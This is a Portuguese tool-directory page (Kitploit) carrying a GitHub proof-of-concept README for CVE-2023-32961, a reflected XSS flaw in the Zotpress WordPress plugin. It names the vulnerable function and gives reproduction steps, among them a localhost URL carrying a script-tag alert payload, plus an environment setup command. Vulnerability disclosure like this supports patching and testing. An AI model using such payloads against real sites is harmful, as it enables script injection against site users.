Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2023-32961 — PoC de CVE-2023-32961 | Kitploit
Ferramentas/GitHubGitHub/lourc0d3/cve-2023-32961
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de Penetração
GitHublourc0d3/cve-2023-32961

CVE-2023-32961

PoC de CVE-2023-32961

Ver Repositório
212há 3 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2023-32961

Este repositório é sobre vulnerabilidade XSS no plugin Zotpress do Wordpress.

Detalhes do componente


Nome do componente

Zotpress

Versão vulnerável

≤ 7.3.3

Slug do componente

zotpress

Link do componente

https://wordpress.org/plugins/zotpress/

Pré-requisito


Não autenticado

Detalhes da vulnerabilidade


Descrição breve

A função get_request_token em zotpress/lib/admin/admin.accounts.oauth.php é vulnerável a um ataque XSS.

Como reproduzir (PoC)

  1. Instale a extensão oauth php para acionar a vulnerabilidade. (Isso é opcional do Zotpress)
  2. Faça login no zotero.org
  3. As condições devem ser atendidas para que a função get_request_token seja executada. (apenas na primeira vez) Envie um payload como este: http://localhost:8080/wp-content/plugins/zotpress/lib/admin/admin.accounts.oauth.php?return_uri=http://localhost:8080&oauth_token=1
  4. Envie o payload abaixo http://localhost:8080/wp-content/plugins/zotpress/lib/admin/admin.accounts.oauth.php?return_uri=http://localhost:8080&oauth_token="><script>alert(1)</script>

Informações adicionais

  • Você precisa de uma conta no zotero.org.

  • Você precisa definir o valor de oauthState como 1 para acioná-lo. Se o payload acima não funcionar, você precisa encontrar uma maneira de definir oauthState como 1.

    • expressão condicional:

      $_GET['oauth_token'] != $state['request_token_info']['oauth_token']
      
  • Instalação fácil da extensão php oauth:

    • Comando de uma linha:

      sudo su; apt-get update; apt-get -y install gcc make autoconf libc-dev pkg-config libpcre3-dev; pecl install oauth; bash -c "echo extension=oauth.so > $PHP_INI_DIR/conf.d/oauth.ini"; service apache2 restart
      
  • Testado na imagem Docker wordpress:latest.

Vídeo PoC

https://www.youtube.com/watch?v=5kZ7bNbs_-Q

Referências


CVE-2023-32961

Baixar ferramenta